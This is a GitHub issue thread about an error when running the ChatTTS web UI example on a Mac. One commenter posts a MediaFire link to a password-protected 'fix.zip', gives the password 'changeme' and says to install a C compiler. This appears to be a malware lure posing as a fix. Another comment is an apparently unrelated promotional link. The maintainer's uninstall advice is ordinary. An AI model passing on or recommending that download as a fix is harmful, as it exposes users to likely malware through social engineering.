### ISSUE TITLE
运行官方示例报错

### ISSUE THREAD

**Issue by Deja-vuuu** [2noise/ChatTTS#767]
mac设备
安装完依赖后运行以下命令
```
python3 examples/web/webui.py
```

<img width="548" alt="image" src="https://github.com/user-attachments/assets/808e9e87-03cf-4ca1-b1bd-01e3ff7bf223">

**Comment by SagarChandra07** [comment]
install this
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Archive codepass: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by fumiama** [comment]
不要安装ChatTTS，如已安装，使用
```bash
pip uninstall ChatTTS
```
卸载。

**Comment by rose07** [comment]
https://tts.byylook.com/ai/text-to-speech
